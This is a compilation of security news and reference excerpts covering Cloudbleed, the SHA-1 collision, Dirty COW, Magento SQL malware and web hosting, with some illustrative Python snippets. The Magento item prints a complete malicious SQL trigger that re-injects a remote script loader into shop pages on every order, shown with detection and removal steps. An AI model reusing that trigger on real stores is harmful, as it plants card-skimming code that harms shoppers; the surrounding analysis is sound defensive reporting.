The greatest potential impact occurred for four days starting on February 13 because Automatic HTTP Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses.

Internal impact of the bug

Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked.

However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines. When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers. In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack. The private key leaked was the one used for this machine to machine encryption.

There were also a small number of secrets used internally at Cloudflare for authentication present.

External impact and cache clearing

More concerning was the fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed. 
This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens). Because Cloudflare operates a large, shared infrastructure an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated other Cloudflare site.

An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information.

Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement.

The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines.

We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything.

Some lessons

The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems. Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems. 
Detailed Timeline

We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution. All of which occurred without any reports that outside parties had identified the issue or exploited it. All times are UTC.

2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information
2017-02-18 0032 Cloudflare receives details of bug from Google
2017-02-18 0040 Cross functional team assembles in San Francisco
2017-02-18 0119 Email Obfuscation disabled worldwide
2017-02-18 0122 London team joins
2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide
2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide
2017-02-20 2159 SAFE_CHAR fix deployed globally
2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide

NOTE: This post was updated to reflect updated information.

https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
  20. Back in the old days, “going online” meant calling up with your modem at 300 bits per second and interacting slowly with a basic command prompt (sometimes BASIC in the literal sense). Noise on the line and other electrical interference could easily turn zeros into ones and vice versa, causing corruption in your session, such as BANANA turned into BANAMA, MANGO into MaNGO, or even ONLINE into +++ATZ.

A common way to spot obvious errors automatically was by using a checksum, quite literally calculated by checking the sum of all the numeric values of every byte in the message. Checksums were used because they were quick to calculate, as far back as the 1960s and 1970s, because even the most underpowered processors usually had an ADD or ACCUMULATE instruction that could efficiently maintain a running total of this sort.

But checksums were error-prone. If you swap round any of the bytes in a message, the checksum remains unchanged because A+B = B+A. Likewise, two errors can easily cancel out, for example if BANANA gets corrupted into CANAMA, because (A+1) + (B-1) = A+B.

Enter the CRC

CRCs, short for cyclic redundancy checks, were a better solution, using a comparatively simple series of bit-shifts and XOR operations to maintain a bigger accumulator that wasn’t so easily fooled by double errors or swapped bytes. CRC-32 produces a 32-bit (4-byte) checksum – today, the term checksum is used metaphorically, not literally to mean that the bytes were added together – designed to do a much better job of detecting accidental errors such as those caused by mistyping or by modem corruption.

But CRCs aren’t any good against deliberate errors. That’s because CRCs are based on a process involving a form of long division, making the algorithm predictable, so the output can be tweaked to be whatever you like by tweaking the input slightly in a way that can be calculated automatically. 
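The two checksum weaknesses just described, byte swaps and compensating errors, are easy to demonstrate: a plain byte-sum misses both corruptions, while CRC-32 catches them. A small sketch (the checksum function here is simply the literal byte-sum the article describes):

```python
import zlib

def checksum(data: bytes) -> int:
    """The literal checksum the article describes: the sum of all byte values."""
    return sum(data)

original  = b"BANANA"
swapped   = b"NABANA"  # bytes reordered: A+B = B+A, so the sum is unchanged
cancelled = b"CANAMA"  # B->C (+1) and N->M (-1) cancel out: (A+1)+(B-1) = A+B

# The simple byte-sum misses both corruptions...
print(checksum(original) == checksum(swapped))    # True
print(checksum(original) == checksum(cancelled))  # True

# ...but CRC-32, being position-sensitive, detects them.
print(zlib.crc32(original) == zlib.crc32(swapped))    # False
print(zlib.crc32(original) == zlib.crc32(cancelled))  # False
```

All three strings sum to the same value (417), which is exactly why a sum-based check cannot tell them apart.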
That makes it trivial to create a message with any checksum you like, for example so that its checksum matches an earlier message in order to create confusion, commit fraud, or worse.

Note that there are only 4 billion (2^32) different possible CRC-32 values, so that at modern computer speeds you could forge a CRC-32 without any arithmetical trickery by brute force, simply by making billions of random modifications to the message until you hit paydirt. But even if you extend your CRC to 64 bits, 128 bits or even more to make accidental duplicates as good as impossible, it’s still easy to calculate forgeries very quickly, with no need to rely on brute force.

Moving up to cryptographic hashes

For security-related purposes, you need what’s commonly referred to as a cryptographic checksum or cryptographic hash. This sort of algorithm is designed not only to detect accidental errors, but also to be “untrickable” enough to prevent deliberate errors. In particular, a cryptographic hash, denoted here as a mathematical function H(), should have at least these characteristics:

1. If you deliberately create two messages M1 and M2 (any two messages; you get to choose both of them) such that H(M1) = H(M2), you have a collision, so that H has failed as a digital fingerprint. Therefore you should not be able to construct a collision, other than by trying over and over with different inputs until you hit the jackpot by chance.

2. If you know that H(M) = X, but you don’t know my message M, then you should not be able to “go backwards” from X to M, other than by trying different messages over and over until you hit the jackpot by chance.

3. If I choose M and tell you what it is, so you can compute H(M) = X for yourself, you should not be able to come up with a different message M’ that also has H(M’) = X, other than by guesswork. (This is much tougher than case 1 because you don’t get to choose any matching pair of hashes from a giant pool of messages. 
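The brute-force forgery mentioned above can be made concrete at toy scale: matching a full 32-bit CRC takes billions of tries, but matching a CRC truncated to 16 bits takes only tens of thousands, which a loop can do in under a second. This sketch simply appends counter bytes to an attacker's message until the truncated CRC collides with the genuine one; the messages are invented examples and crc16 here is just CRC-32 masked to 16 bits.

```python
import zlib

def crc16(data: bytes) -> int:
    """A toy 16-bit check: CRC-32 truncated to its low 16 bits."""
    return zlib.crc32(data) & 0xFFFF

genuine     = b"PAY ALICE $10"       # invented example message
forged_base = b"PAY MALLORY $9999"   # attacker's message

target = crc16(genuine)

# Brute force: append a counter until the truncated CRC matches the target.
# With only 2**16 possible values, trying 2**20 suffixes makes a collision
# overwhelmingly likely.
for n in range(2**20):
    candidate = forged_base + b" #" + str(n).encode()
    if crc16(candidate) == target:
        break

print(candidate)
print(crc16(candidate) == crc16(genuine))  # the 16-bit check is fooled
```

Scaling the same search up to 32 bits is merely a matter of patience, which is the article's point: a short non-cryptographic check cannot resist a determined forger at all.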
You have to match my hash, not any hash, which squares the effort needed.)

For many years, an algorithm called MD5 was widely used because it claimed to provide these three protections against abuse, but it is now forbidden in the cryptographic world because it is known to fail on Promise One above. Once a hashing algorithm fails in respect of Promise One, it’s prudent to assume it won’t meet its other design goals either, even if it seems to be holding out on the other two promises. MD5 collisions are easy to generate on purpose, so the algorithm can no longer be trusted.

SHA-1 replaces MD5

SHA-1 was the next-most-complex hash after MD5, and was widely used as a replacement when MD5 fell out of favour. Greatly oversimplified, the SHA-1 algorithm consumes its input in blocks of sixteen 32-bit words (512 bits, or 64 bytes), mixing each block into a cumulative hash of five 32-bit words (160 bits, or 20 bytes).

for block in blocks() do
   for i = 17 to 80 do
      -- each step here extends the original 16-word input
      -- block to 80 words by adding one word made by mixing
      -- together four of the previous sixteen words.
      block[i] = minimixtogether(block,i)
   end
   for i = 1 to 80 do
      -- each step here mixes one of the words from the 80-word
      -- "extended block" into the five-word hash accumulator
      hash = giantmixtogether(block,i)
   end
end

The giantmixtogether() function that scrambles the extended input into the hash uses a range of different operations, including NOT, AND, OR, XOR, ADD and ROL (rotate left); the minimixtogether() function used to massage the input data uses XOR and ROL.

The algorithm certainly looks complicated, and at first glance you would assume that it mixes-minces-shreds-and-liquidises its input more than well enough to be “untrickable”. Indeed, the complexity of SHA-1 was considered sufficient to immunise it against the weaknesses in the similar but simpler MD5 algorithm. 
At the same time, SHA-1 was not so much more complicated than MD5 that it would run too slowly to be a convenient replacement.

SHA-1 considered harmful

For years, however, experts have been telling everyone to stop using SHA-1, and to use more complex hash algorithms such as SHA-2 and SHA-3 instead, predicting that the first actual real-world, in-your-face chink in SHA-1’s armour would turn up soon. Google’s Chrome browser, for example, stopped accepting web site certificates with SHA-1 hashes at the start of 2017, considering them no longer safe enough. The Mozilla Firefox browser will soon follow suit.

The reason is simple: as soon as someone actually turns theory into reality, and produces a hash collision, you can no longer rely on saying, “She’ll be right for a while yet,” because your “while yet” period just expired. So it’s a good idea to get ahead of the game and to abandon creaky cryptographic code before it goes “Bang!”

Even if a collision takes an enormous amount of work – imagine that you’d need 110 top-end graphics cards running flat out for a whole year, for example – the first actual collision would be what you might call the digital disproof of the pudding.

The digital disproof

So, to cut what has become a long story short, you need to know that researchers from Google and the CWI Institute in Amsterdam…

…have just disproved the pudding. Bang!

A hash collision that in theory should have taken them thousands of years to stumble upon by chance has been created on purpose within all of our lifetimes – and that should simply never have happened. Apparently, they did indeed need 110 top-end graphics cards running for a whole year, but that is still 100,000 times faster than the design goals (and the theoretical strength) of SHA-1, making SHA-1 a risky proposition for evermore.

TL;DR: SHA-1 really is broken, so use a stronger hash from now on, because cryptographic attacks only ever get faster. 
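Moving to a stronger hash is usually a one-line change. Python's standard hashlib, for instance, exposes SHA-1, SHA-256 and SHA3-256 behind the same interface, so a sketch of swapping the algorithm looks like this (the input message is an invented example):

```python
import hashlib
import hmac

message = b"hello, world"  # invented example input

# The deprecated choice: SHA-1's 160-bit digest is 40 hex characters.
sha1 = hashlib.sha1(message).hexdigest()

# Stronger drop-in replacements with an identical API (256-bit digests).
sha256 = hashlib.sha256(message).hexdigest()
sha3   = hashlib.sha3_256(message).hexdigest()

print(len(sha1), len(sha256), len(sha3))  # 40 64 64

# When verifying data against a known-good digest, compare in constant
# time to avoid leaking information through timing.
expected = hashlib.sha256(message).hexdigest()
print(hmac.compare_digest(sha256, expected))  # True
```

Because the interface is uniform, upgrading stored fingerprints is mostly a data-migration problem, not a code problem, which is one reason the experts' advice to move off SHA-1 early was practical as well as prudent.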
https://nakedsecurity.sophos.com/2017/02/23/bang-sha-1-collides-at-38762cf7f55934b34d179ae6a4c80cadccbb7f0a/
  21. https://dirtycow.ninja/
  22. Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems, including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester.

Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation bug, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer.[1] The attack itself does not leave traces in the system log.

The vulnerability has the CVE designation CVE-2016-5195. The Debian operating system distribution has announced that it has released a patch for the vulnerability. Dirty COW was one of the first security issues transparently fixed in Ubuntu by the Canonical Live Patch service. It has been demonstrated that the bug can be utilized to root any Android device up to Android version 7.

History

The bug had been lurking in the Linux kernel since version 2.6.22, released in September 2007, and there is information that it had been actively exploited at least since October 2016.[2] The bug has been patched in Linux kernel versions 4.8.3, 4.7.9, 4.4.26 and newer.

Applications

The Dirty COW vulnerability has many perceived use cases, including proven examples such as obtaining root permissions in Android devices, as well as several speculated implementations. There are many binaries used in Linux which are read-only, and can only be modified or written to by a user of higher permissions, such as root. When privileges are escalated, whether by legitimate or illegitimate means – such as by using the Dirty COW exploit – the user can modify usually-unmodifiable binaries and files. 
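The copy-on-write semantics that the bug subverts can be observed safely from user space: a private (copy-on-write) file mapping accepts writes, but those writes land in a private copy of the page and never reach the file. The sketch below is only an illustration of the mechanism Dirty COW races against, not an exploit; the function name and file contents are invented.

```python
import mmap
import os
import tempfile

def cow_demo():
    """Write through a copy-on-write mapping and report what changed.

    Returns (what the private mapping sees, what the file still contains).
    Illustrative only; this demonstrates normal COW semantics, not the bug."""
    fd, path = tempfile.mkstemp()
    os.write(fd, b"read-only contents")
    os.close(fd)
    try:
        with open(path, "rb") as f:
            # ACCESS_COPY gives copy-on-write semantics: writes go to a
            # private copy of the page, never to the underlying file.
            # Dirty COW's race condition let such a write reach the
            # original read-only mapping instead of the private copy.
            mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_COPY)
            mm[0:9] = b"OVERWRITE"
            private_view = mm[:]
            mm.close()
        with open(path, "rb") as f:
            on_disk = f.read()
    finally:
        os.remove(path)
    return private_view, on_disk

private_view, on_disk = cow_demo()
print(private_view)  # the mapping sees the write
print(on_disk)       # the file on disk is untouched
```

When the kernel honours copy-on-write correctly, the file stays pristine; Dirty COW's significance is precisely that the race let the write escape the private copy and modify the read-only original.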
If a malicious individual could use the Dirty COW vulnerability to escalate their permissions, they could change a file, such as /bin/bash, so that it performs additional, unexpected functions, such as a keylogger. When a standard user uses /bin/bash, they will not know that they are actually providing their passwords and activity to a malicious third party.

Remedies and recourse

When the exploit was first disclosed, anyone using a machine running Linux was susceptible to it. The only complete cure is a patch or an upgrade to a newer kernel version which is no longer vulnerable. Linus Torvalds committed a patch on 18 October 2016, acknowledging that it was an ancient bug whose fix had actually been attempted once before, eleven years earlier. Some distributors provide patches, such as Canonical, who provide a live patch. In the absence of a patch, there are a few mitigation technologies, including SystemTap, and very little protection from SELinux or AppArmor. Antivirus software has the potential to detect elevated-permissions attacks, but it cannot prevent the attack. When given the opportunity, the safest route is to upgrade the Linux kernel to one of the following versions:

Earliest kernel version fixed    Linux OS that uses this
3.2.0-113.155                    Ubuntu 12.04 LTS
3.13.0-100.147                   Ubuntu 14.04 LTS (Linux Mint 17.1)
3.16.36-1+deb8u2                 Debian 8
4.4.0-45.66                      Ubuntu 16.04 LTS
4.7.8-1                          Debian unstable
4.8.0-26.28                      Ubuntu 16.10

https://en.wikipedia.org/wiki/Dirty_COW
  23. 10 Illustrations That Show Just How Much the Internet Has Changed Our Lives

None of us should ever succumb to panic — real life is definitely still out there despite the huge role that the Internet plays in modern life. Gadgets and technology play a part in our lives, but it really is just a part. Nevertheless, it’s funny to think about the hundreds of little ways these things have changed our behavior. Here are 10 of the ones we at Bright Side have noticed. How many do you recognize?

Illustrator: Astkhik Rakimova exclusively for Bright Side
Preview photo credit: Laughing Colours
  24. Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware targeting websites running on the Magento eCommerce platform. The novelty is that this is the first malware that hides its code in the website’s database and is written entirely in SQL.

The malware is triggered every time a user places a new order; the “SQL trigger” is then executed before the Magento platform even assembles the web page. The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution on the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database, searching for suspicious SQL triggers such as those containing admin, .js, script or < (HTML tags):

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once the malicious trigger is discovered, it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks start with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. 
Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
    UPDATE core_config_data
    SET value = IF(
        value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
        value,
        CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
    )
    WHERE path='design/head/includes'
       OR path='design/footer/absolute_footer'
       OR path='design/footer/copyright';
    UPDATE cms_block
    SET content = IF(
        content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
        content,
        CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
    );
END;

de Groot has updated MageReport and the Malware Scanner to detect this new type of malware.

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
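The manual inspection the article describes — looking for triggers whose bodies contain admin, .js, script or HTML tags — can be automated by scanning the output of SHOW TRIGGERS. A hedged sketch: the function, the input format, and the sample trigger text below are invented for illustration; in practice you would feed it the real output of the n98-magerun command shown above.

```python
import re

# Patterns the article suggests flagging inside trigger definitions.
SUSPICIOUS = [r"admin", r"\.js\b", r"script", r"<"]

def find_suspicious_triggers(show_triggers_output: str) -> list:
    """Return names of triggers whose definition matches a suspicious pattern.

    Expects lines of the form '<trigger_name>\t<statement>' as a simplified
    stand-in for `SHOW TRIGGERS` output."""
    flagged = []
    for line in show_triggers_output.strip().splitlines():
        name, _, statement = line.partition("\t")
        if any(re.search(p, statement, re.IGNORECASE) for p in SUSPICIOUS):
            flagged.append(name)
    return flagged

# Invented sample: one benign trigger, one resembling the malware above.
sample = (
    "update_stock\tUPDATE inventory SET qty = qty - NEW.qty\n"
    "after_insert_order\tUPDATE cms_block SET content = "
    "CONCAT(content, '<script src=\"https://mage-storage.pw/cdn/flexible-min.js\"></script>')"
)
print(find_suspicious_triggers(sample))
```

Any trigger this flags should be inspected by hand before dropping it, since legitimate triggers can also mention these tokens.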
  25. Choosing a web hosting company is a big decision with many consequences. The hosting company greatly influences your website’s speed and reliability, causing your visitors to leave with either a good or bad impression. Whether you’re looking to host your very first site or want to move an existing site to a new provider, taking the time to think through each of the following items can help you feel confident that you have made the best decision that will meet your needs long into the future.

Physical Hardware—The physical hardware running your site is one of the most important considerations, so take the time to research the server types a hosting company is using. Is high-speed SSD storage included? Does it use redundant devices, such as RAID-configured hard drives? What is its response time when replacing failed hardware, and are backups kept onsite?

Technical Support Team—No matter how good a host may be, it’s likely you’ll need to work with its support team at some point. Discover your comfort level when communicating with them upfront, as this may very well impact how quickly you arrive at issue resolution.

Response Times & Contact Options—Some web hosts require that you work through their ticketing system. Others have a phone-in option, use live web chat, or want you to reach them via email. So what is the best way to get in touch with them? Is the team available 24/7 or only during certain hours?

Reputation—In evaluating host contenders, reading reviews can help you make a more informed decision. A company I worked for (Hostadvice.com) is one of the resources you can use here—it’s a community of webmasters who share their experiences with different hosting providers to help find the most suitable option.

Hosting Features—Beyond providing you a server(s) where you can load your site contents, some hosts include many features, others make them available as add-ons, and still others don’t offer any of them. 
These include:

- Disk storage and bandwidth limitations
- Software installation script library
- SSL certificates
- Website design tools and themes
- Daily backups and fees for restores (if any)
- Site migration
- SPAM protection
- Domain registration and privacy protection

Acquaint yourself with each host's feature list to determine those that best match your specific needs.

Price of Hosting—Web host pricing is nowhere near uniform. Only by taking the time to comparison shop will you find a company that offers high-quality hosting at a reasonable price. Determine accepted payment methods and look for discounts if you're able to pay for service a year in advance.

Control Panel—A control panel or portal is the interface you'll use to manage your website once it's live. Here you can perform such tasks as a manual backup, resetting your server (if allowed), or configuring additional domains. Two of the most popular control panel options are cPanel and Plesk. Choosing a host that offers one of these helps make site maintenance easier.

Datacenter Geolocation—Having your site hosted at a datacenter that is geographically close to your target audience helps maximize the site load speed experienced by your visitors. That said, organizations catering to a global audience should disregard this and consider using a content delivery network instead (see below), as it will replicate their website in multiple geolocations to improve performance.

Content Delivery Network—If your site is likely to have high bandwidth requirements, serve large files, or have other significant demands, you'll want a content delivery network (CDN) to serve up at least a portion of your content. A CDN enables your site to quickly and efficiently serve a very high number of customers, performance that isn't always possible with traditional hosting options. The host should also make CDN integration easy for you.
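One rough way to compare datacenter geolocations is to measure TCP connect latency from a machine near your target audience to each candidate host. A small sketch, assuming the hostnames below are placeholders you would replace with each provider's actual test endpoints:

```python
import socket
import time

def connect_latency_ms(host: str, port: int = 443, timeout: float = 3.0) -> float:
    """Return the TCP handshake time to host:port in milliseconds."""
    start = time.perf_counter()
    with socket.create_connection((host, port), timeout=timeout):
        pass  # connection established; we only care about handshake time
    return (time.perf_counter() - start) * 1000.0

# Placeholder endpoints for two candidate datacenters; substitute real ones.
for host in ("speedtest-us.example.com", "speedtest-eu.example.com"):
    try:
        print(f"{host}: {connect_latency_ms(host):.1f} ms")
    except OSError as exc:
        print(f"{host}: unreachable ({exc})")
```

Run it a few times from the regions your visitors live in; a consistently lower handshake time is a reasonable proxy for geographic proximity, though it says nothing about the server's own speed under load.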
Website Security—In addition to other threats, distributed denial of service (DDoS) attacks are a frequent form of cyberattack, with millions of sites being hit every day at rates of tens, or even hundreds, of gigabits per second. Protection is a critical component for any website. Most web hosts offer basic firewall and DDoS protection, but the most effective threat mitigation available today involves routing all of your site traffic through a service that scrubs out nefarious traffic before it has an opportunity to wreak havoc with your content.

Room for Growth—When starting a new website, perhaps you only need a simple, shared hosting account. But once it becomes a success, your hosting needs will likely grow commensurately. Looking ahead, then, you may want to use a hosting company that provides such expansion options as virtual private servers (VPSs), dedicated servers, cloud hosting, and more.

https://www.incapsula.com/blog/choosing-web-host.html
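Scrubbing services do this filtering upstream, at the network edge, but the underlying idea (drop traffic that exceeds a sane rate, let the rest through) can be illustrated at the application layer. A toy token-bucket limiter, a common building block in such mitigation and not something from the article itself:

```python
import time

class TokenBucket:
    """Toy token-bucket rate limiter: allow at most `rate` requests/second
    with bursts up to `capacity` tokens. Real DDoS scrubbing happens
    upstream at the network edge; this only illustrates the principle."""

    def __init__(self, rate: float, capacity: float):
        self.rate = rate          # tokens added per second
        self.capacity = capacity  # maximum burst size
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self) -> bool:
        """Spend one token if available; otherwise reject the request."""
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

bucket = TokenBucket(rate=5.0, capacity=5.0)
results = [bucket.allow() for _ in range(10)]  # a burst of 10 instant requests
print(results.count(True), "allowed,", results.count(False), "dropped")
```

With capacity 5, an instantaneous burst of 10 requests gets roughly the first 5 through and the rest dropped; a legitimate visitor arriving at a normal pace is never affected because tokens refill continuously.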